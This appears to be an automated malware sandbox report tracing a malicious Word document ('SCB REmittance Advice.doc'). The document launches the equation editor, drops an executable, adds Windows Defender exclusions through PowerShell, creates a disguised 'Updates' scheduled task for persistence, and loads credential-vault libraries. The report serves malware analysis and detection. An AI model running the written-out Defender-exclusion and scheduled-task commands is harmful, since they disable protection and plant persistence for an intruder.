                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.drBinary or memory string: UPDATE [patient] SET [patientId] = @patientId, [firstName] = @firstName, [lastName] = @lastName, [mobileNumber] = @mobileNumber, [email] = @email, [userName] = @userName, [password] = @password WHERE (([patientId] = @Original_patientId) AND ([firstName] = @Original_firstName) AND ([lastName] = @Original_lastName) AND ((@IsNull_mobileNumber = 1 AND [mobileNumber] IS NULL) OR ([mobileNumber] = @Original_mobileNumber)) AND ([email] = @Original_email) AND ([userName] = @Original_userName) AND ([password] = @Original_password));
                  Source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.drBinary or memory string: UPDATE [patient] SET [userName] = @userName, [password] = @password, [patientId] = @patientId WHERE (([userName] = @Original_userName) AND ([password] = @Original_password) AND ([patientId] = @Original_patientId));
                  Source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.drBinary or memory string: INSERT INTO [patient] ([patientId], [firstName], [lastName], [mobileNumber], [email], [userName], [password]) VALUES (@patientId, @firstName, @lastName, @mobileNumber, @email, @userName, @password);
                  Source: SCB REmittance Advice.docReversingLabs: Detection: 42%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\sharon38892.exe "C:\Users\user\AppData\Roaming\sharon38892.exe"
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe"
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp"
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess created: C:\Users\user\AppData\Roaming\sharon38892.exe "C:\Users\user\AppData\Roaming\sharon38892.exe"
                  Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {E2BA91ED-D885-4B20-9033-3784D17E4A5D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                  Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp7D2B.tmp"
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\sharon38892.exe "C:\Users\user\AppData\Roaming\sharon38892.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess created: C:\Users\user\AppData\Roaming\sharon38892.exe "C:\Users\user\AppData\Roaming\sharon38892.exe"Jump to behavior
                  Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp7D2B.tmp"
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: mozglue.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: ucrtbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dll
                  Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeSection loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeSection loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeSection loaded: bcrypt.dll
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
